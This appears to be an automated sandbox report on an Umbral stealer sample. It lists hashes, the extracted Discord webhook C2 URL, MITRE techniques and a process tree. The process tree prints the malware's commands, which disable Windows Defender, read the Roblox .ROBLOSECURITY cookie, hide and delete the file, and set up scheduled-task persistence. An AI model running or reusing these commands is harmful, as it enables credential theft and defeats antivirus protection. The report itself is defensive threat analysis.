umbral | 20be105c4a33ebf77ef4db7e8b6ebbb39b156fe1dd16473a7255903f33b76846

General

Target

loader.exe
Size

365KB
MD5

cbd720ad4f7be1c099ec22f56ee61dd6
SHA1

9989030c7ea1756e1834c464688d418e773919fc
SHA256

20be105c4a33ebf77ef4db7e8b6ebbb39b156fe1dd16473a7255903f33b76846
SHA512

2ad87fdf5046be22eec58fe71326ab0bcc2a2ca019e1b5519ec1ecbdfbb83731a254c7f400ca48cacb9917da6c85d41a913aa0f8f5b21408a3f2d1e8895e9740
SSDEEP

6144:UsLqdufVUNDa4loZM3fsXtioRkts/cnnK6cMlibJksyVtGXTOMdRYspb8e1m+Fii:PFUNDamoZ1tlRk83MlibJksyVtGXTOMX

Score

10^/10

umbral evasion execution persistence spyware stealer

Malware Config

Extracted

Family

umbral

C2

https://discordapp.com/api/webhooks/1246463015998586960/d4v_qESsKe8s7VticwxHvyytkOUO321t7x3oNxoyCNYQuwczEVfPUDFWHLnPpAM4tNJ_

Signatures

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\loader.exe	family_umbral
behavioral1/memory/2420-11-0x0000000001020000-0x0000000001060000-memory.dmp	family_umbral

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2264 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

loader.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts loader.exe
Executes dropped EXE 6 IoCs

Processes:

loader.exe icsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exe

pid process

2420 loader.exe
2236 icsys.icn.exe
1600 explorer.exe
2432 spoolsv.exe
840 svchost.exe
1800 spoolsv.exe
Loads dropped DLL 6 IoCs

Processes:

loader.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exe

pid process

2412 loader.exe
2412 loader.exe
2236 icsys.icn.exe
1600 explorer.exe
2432 spoolsv.exe
840 svchost.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2264	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	loader.exe

pid	process
2420	loader.exe
2236	icsys.icn.exe
1600	explorer.exe
2432	spoolsv.exe
840	svchost.exe
1800	spoolsv.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	svchost.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com

flow	ioc
4	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

explorer.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\explorer.exe	explorer.exe
File opened for modification	C:\Windows\SysWOW64\explorer.exe	svchost.exe

Drops file in Windows directory 5 IoCs

Processes:

loader.exeicsys.icn.exeexplorer.exespoolsv.exe

description	ioc	process
File opened for modification	C:\Windows\Resources\Themes\icsys.icn.exe	loader.exe
File opened for modification	\??\c:\windows\resources\themes\explorer.exe	icsys.icn.exe
File opened for modification	\??\c:\windows\resources\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\resources\svchost.exe	spoolsv.exe
File opened for modification	C:\Windows\Resources\tjud.exe	explorer.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1172 schtasks.exe
604 schtasks.exe
2932 schtasks.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

1088 wmic.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2148 PING.EXE

pid	process
1172	schtasks.exe
604	schtasks.exe
2932	schtasks.exe

pid	process
1088	wmic.exe

pid	process
2148	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

loader.exeloader.exe powershell.exepowershell.exepowershell.exepowershell.exeicsys.icn.exeexplorer.exesvchost.exe

pid	process
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2412	loader.exe
2420	loader.exe
2264	powershell.exe
2500	powershell.exe
1904	powershell.exe
2956	powershell.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
1600	explorer.exe
840	svchost.exe
840	svchost.exe
840	svchost.exe
840	svchost.exe
840	svchost.exe
840	svchost.exe
840	svchost.exe
840	svchost.exe
840	svchost.exe
840	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

explorer.exesvchost.exe

pid process

1600 explorer.exe
840 svchost.exe

pid	process
1600	explorer.exe
840	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

loader.exe wmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	2420	loader.exe
Token: SeIncreaseQuotaPrivilege	2696	wmic.exe
Token: SeSecurityPrivilege	2696	wmic.exe
Token: SeTakeOwnershipPrivilege	2696	wmic.exe
Token: SeLoadDriverPrivilege	2696	wmic.exe
Token: SeSystemProfilePrivilege	2696	wmic.exe
Token: SeSystemtimePrivilege	2696	wmic.exe
Token: SeProfSingleProcessPrivilege	2696	wmic.exe
Token: SeIncBasePriorityPrivilege	2696	wmic.exe
Token: SeCreatePagefilePrivilege	2696	wmic.exe
Token: SeBackupPrivilege	2696	wmic.exe
Token: SeRestorePrivilege	2696	wmic.exe
Token: SeShutdownPrivilege	2696	wmic.exe
Token: SeDebugPrivilege	2696	wmic.exe
Token: SeSystemEnvironmentPrivilege	2696	wmic.exe
Token: SeRemoteShutdownPrivilege	2696	wmic.exe
Token: SeUndockPrivilege	2696	wmic.exe
Token: SeManageVolumePrivilege	2696	wmic.exe
Token: 33	2696	wmic.exe
Token: 34	2696	wmic.exe
Token: 35	2696	wmic.exe
Token: SeIncreaseQuotaPrivilege	2696	wmic.exe
Token: SeSecurityPrivilege	2696	wmic.exe
Token: SeTakeOwnershipPrivilege	2696	wmic.exe
Token: SeLoadDriverPrivilege	2696	wmic.exe
Token: SeSystemProfilePrivilege	2696	wmic.exe
Token: SeSystemtimePrivilege	2696	wmic.exe
Token: SeProfSingleProcessPrivilege	2696	wmic.exe
Token: SeIncBasePriorityPrivilege	2696	wmic.exe
Token: SeCreatePagefilePrivilege	2696	wmic.exe
Token: SeBackupPrivilege	2696	wmic.exe
Token: SeRestorePrivilege	2696	wmic.exe
Token: SeShutdownPrivilege	2696	wmic.exe
Token: SeDebugPrivilege	2696	wmic.exe
Token: SeSystemEnvironmentPrivilege	2696	wmic.exe
Token: SeRemoteShutdownPrivilege	2696	wmic.exe
Token: SeUndockPrivilege	2696	wmic.exe
Token: SeManageVolumePrivilege	2696	wmic.exe
Token: 33	2696	wmic.exe
Token: 34	2696	wmic.exe
Token: 35	2696	wmic.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	1904	powershell.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeIncreaseQuotaPrivilege	2076	wmic.exe
Token: SeSecurityPrivilege	2076	wmic.exe
Token: SeTakeOwnershipPrivilege	2076	wmic.exe
Token: SeLoadDriverPrivilege	2076	wmic.exe
Token: SeSystemProfilePrivilege	2076	wmic.exe
Token: SeSystemtimePrivilege	2076	wmic.exe
Token: SeProfSingleProcessPrivilege	2076	wmic.exe
Token: SeIncBasePriorityPrivilege	2076	wmic.exe
Token: SeCreatePagefilePrivilege	2076	wmic.exe
Token: SeBackupPrivilege	2076	wmic.exe
Token: SeRestorePrivilege	2076	wmic.exe
Token: SeShutdownPrivilege	2076	wmic.exe
Token: SeDebugPrivilege	2076	wmic.exe
Token: SeSystemEnvironmentPrivilege	2076	wmic.exe
Token: SeRemoteShutdownPrivilege	2076	wmic.exe
Token: SeUndockPrivilege	2076	wmic.exe
Token: SeManageVolumePrivilege	2076	wmic.exe
Token: 33	2076	wmic.exe
Token: 34	2076	wmic.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

loader.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exe

pid	process
2412	loader.exe
2412	loader.exe
2236	icsys.icn.exe
2236	icsys.icn.exe
1600	explorer.exe
1600	explorer.exe
2432	spoolsv.exe
2432	spoolsv.exe
840	svchost.exe
840	svchost.exe
1800	spoolsv.exe
1800	spoolsv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

loader.exeloader.exe icsys.icn.exeexplorer.exespoolsv.exesvchost.exe

description	pid	process	target process
PID 2412 wrote to memory of 2420	2412	loader.exe	loader.exe
PID 2412 wrote to memory of 2420	2412	loader.exe	loader.exe
PID 2412 wrote to memory of 2420	2412	loader.exe	loader.exe
PID 2412 wrote to memory of 2420	2412	loader.exe	loader.exe
PID 2420 wrote to memory of 2696	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 2696	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 2696	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 2788	2420	loader.exe	attrib.exe
PID 2420 wrote to memory of 2788	2420	loader.exe	attrib.exe
PID 2420 wrote to memory of 2788	2420	loader.exe	attrib.exe
PID 2420 wrote to memory of 2264	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 2264	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 2264	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 2500	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 2500	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 2500	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 1904	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 1904	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 1904	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 2956	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 2956	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 2956	2420	loader.exe	powershell.exe
PID 2412 wrote to memory of 2236	2412	loader.exe	icsys.icn.exe
PID 2412 wrote to memory of 2236	2412	loader.exe	icsys.icn.exe
PID 2412 wrote to memory of 2236	2412	loader.exe	icsys.icn.exe
PID 2412 wrote to memory of 2236	2412	loader.exe	icsys.icn.exe
PID 2236 wrote to memory of 1600	2236	icsys.icn.exe	explorer.exe
PID 2236 wrote to memory of 1600	2236	icsys.icn.exe	explorer.exe
PID 2236 wrote to memory of 1600	2236	icsys.icn.exe	explorer.exe
PID 2236 wrote to memory of 1600	2236	icsys.icn.exe	explorer.exe
PID 1600 wrote to memory of 2432	1600	explorer.exe	spoolsv.exe
PID 1600 wrote to memory of 2432	1600	explorer.exe	spoolsv.exe
PID 1600 wrote to memory of 2432	1600	explorer.exe	spoolsv.exe
PID 1600 wrote to memory of 2432	1600	explorer.exe	spoolsv.exe
PID 2432 wrote to memory of 840	2432	spoolsv.exe	svchost.exe
PID 2432 wrote to memory of 840	2432	spoolsv.exe	svchost.exe
PID 2432 wrote to memory of 840	2432	spoolsv.exe	svchost.exe
PID 2432 wrote to memory of 840	2432	spoolsv.exe	svchost.exe
PID 840 wrote to memory of 1800	840	svchost.exe	spoolsv.exe
PID 840 wrote to memory of 1800	840	svchost.exe	spoolsv.exe
PID 840 wrote to memory of 1800	840	svchost.exe	spoolsv.exe
PID 840 wrote to memory of 1800	840	svchost.exe	spoolsv.exe
PID 2420 wrote to memory of 2076	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 2076	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 2076	2420	loader.exe	wmic.exe
PID 1600 wrote to memory of 2588	1600	explorer.exe	Explorer.exe
PID 1600 wrote to memory of 2588	1600	explorer.exe	Explorer.exe
PID 1600 wrote to memory of 2588	1600	explorer.exe	Explorer.exe
PID 1600 wrote to memory of 2588	1600	explorer.exe	Explorer.exe
PID 840 wrote to memory of 1172	840	svchost.exe	schtasks.exe
PID 840 wrote to memory of 1172	840	svchost.exe	schtasks.exe
PID 840 wrote to memory of 1172	840	svchost.exe	schtasks.exe
PID 840 wrote to memory of 1172	840	svchost.exe	schtasks.exe
PID 2420 wrote to memory of 1484	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 1484	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 1484	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 632	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 632	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 632	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 1740	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 1740	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 1740	2420	loader.exe	powershell.exe
PID 2420 wrote to memory of 1088	2420	loader.exe	wmic.exe
PID 2420 wrote to memory of 1088	2420	loader.exe	wmic.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2788 attrib.exe

pid	process
2788	attrib.exe

C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2412
- \??\c:\users\admin\appdata\local\temp\loader.exe
  c:\users\admin\appdata\local\temp\loader.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2696
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "c:\users\admin\appdata\local\temp\loader.exe "
    3⤵
    - Views/modifies file attributes
    PID:2788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\loader.exe '
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2956
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2076
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:1484
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    PID:1740
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1088
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "c:\users\admin\appdata\local\temp\loader.exe " && pause
    3⤵
    PID:896
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2148
- C:\Windows\Resources\Themes\icsys.icn.exe
  C:\Windows\Resources\Themes\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2236
- - \??\c:\windows\resources\themes\explorer.exe
    c:\windows\resources\themes\explorer.exe
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - \??\c:\windows\resources\spoolsv.exe
      c:\windows\resources\spoolsv.exe SE
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2432
    - - \??\c:\windows\resources\svchost.exe
        
        c:\windows\resources\svchost.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:840
      - \??\c:\windows\resources\spoolsv.exe
        
        c:\windows\resources\spoolsv.exe PR
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1800
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:25 /f
        6⤵
        Creates scheduled task(s)
        
        PID:1172
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:26 /f
        6⤵
        Creates scheduled task(s)
        
        PID:604
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:27 /f
        6⤵
        Creates scheduled task(s)
        
        PID:2932
  - - C:\Windows\Explorer.exe
      C:\Windows\Explorer.exe
      4⤵
      PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Defense Evasion

Hide Artifacts

2

T1564

Hidden Files and Directories

Modify Registry

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
230KB

MD5
d23ca81d16873706f5e26fbac64eaee9

SHA1
c49585cbcc6e5286fba1c7a3fe582ea0e38ed5ee

SHA256
007ae5e7086ce92765cb6f3877663b04146f14deba2edb9582d90d4451b443d7

SHA512
4a7d4be3f7a1e27e9c925b57a5e53754f8f39ebabf479e041f620ef5271a7154fe57a407ff59f859f02f149bb60925e2f4e2c9c49f415fd42e780c7ea23922d4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HBCYEX4WMJ3PD0O91IYT.temp

Filesize
7KB

MD5
d9788b07146c954acd0efdbae53e440b

SHA1
8619d934a83ab9799853cd2637fe332562b12ed2

SHA256
f5713b1c4257441ade2d0d4ae48837b789c478b6bf62fc868ba6075c7a5156af

SHA512
e886edaf83ebbda94ebc606492ad845916ff99825c6e3776455317558cb657ea84a1d399f1184f8126c86dde8ebc66266b4a2c381cc714035171a9af022fbbfc

Download Submit
C:\Windows\Resources\Themes\explorer.exe

Filesize
135KB

MD5
1905292586e7ae7531079e89c140e930

SHA1
04ab85a09795edadb72eda9d7bac49560aa11ac5

SHA256
f74a57c28678a69528bceebe893b8e8a8cb69168d221e5d0efe8cd0b17a6c6d5

SHA512
5ef17f274c6dd764b2084a399a5b04df2cf5ffeb6ca329606b1f98f453a16d40e105f7bae01d2c1fb33a50624e7965b0fc55c5b0df861ee549aaf7403b63e5fa

Download Submit
C:\Windows\Resources\Themes\icsys.icn.exe

Filesize
135KB

MD5
b6c6d532091f6de047c1a68a4b69bf10

SHA1
01439b14f2158014ef0255092f4c11a136483889

SHA256
39931e1f612c4cc3ddef588ce4a1d1c1543e85cf16959eb738ed39eb0b2b1a11

SHA512
b652116e7a2ebe98cb8e43d024542fdb5c8daccf85dde4c00738eedd55d7a1195155ed4b4ea26fd8e91ce1bbef54c9cd224cd4606b2028168e82c0c2de45798d

Download Submit
C:\Windows\Resources\spoolsv.exe

Filesize
135KB

MD5
546e236ea4de2b39579ff0f6c02e6f95

SHA1
c9139eeb9d830cb926773b0cb44287133b1eeb34

SHA256
2f1c7411962af8b528886ea4067f77aa6f2a4a25f5829c2888bb0d09a78a0b87

SHA512
e69a0ede110fb731146c27f43e20bc14e494dfa2154b00c0b310201fba755029633620ed75f663a6f5f58863d38c65855ed56984d5eeb6bbd9815d7ef5eefb91

Download Submit
C:\Windows\Resources\svchost.exe

Filesize
135KB

MD5
2bed3603d534ed5d7d0f356e9d2cb855

SHA1
84960e6e77db59cd06f4203a66dc40d7f93de61d

SHA256
949d06348a5179530f55ac50a3ceb3f78fb70516e10597252b324cda7e9c6548

SHA512
1afce3d003594a4f23a4f8ecda89675d4dabc565023db7735fbf9b81fcc6fa5ff5547eff0a0cb474fb9b233d147c3b00da106f3b3432301c048aa652de597f3b

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1600-73-0x0000000000330000-0x000000000034F000-memory.dmp

Filesize
124KB

Download
memory/1740-105-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/1740-106-0x0000000001D20000-0x0000000001D28000-memory.dmp

Filesize
32KB

Download
memory/1800-96-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2236-99-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2236-61-0x00000000003C0000-0x00000000003DF000-memory.dmp

Filesize
124KB

Download
memory/2264-18-0x00000000003B0000-0x00000000003B8000-memory.dmp

Filesize
32KB

Download
memory/2264-17-0x000000001B850000-0x000000001BB32000-memory.dmp

Filesize
2.9MB

Download
memory/2412-0-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2412-49-0x0000000000360000-0x000000000037F000-memory.dmp

Filesize
124KB

Download
memory/2412-98-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2420-12-0x000007FEF5FB0000-0x000007FEF699C000-memory.dmp

Filesize
9.9MB

Download
memory/2420-11-0x0000000001020000-0x0000000001060000-memory.dmp

Filesize
256KB

Download
memory/2420-10-0x000007FEF5FB3000-0x000007FEF5FB4000-memory.dmp

Filesize
4KB

Download
memory/2420-110-0x000007FEF5FB0000-0x000007FEF699C000-memory.dmp

Filesize
9.9MB

Download
memory/2432-86-0x00000000002F0000-0x000000000030F000-memory.dmp

Filesize
124KB

Download
memory/2432-97-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2432-77-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2500-24-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2500-25-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads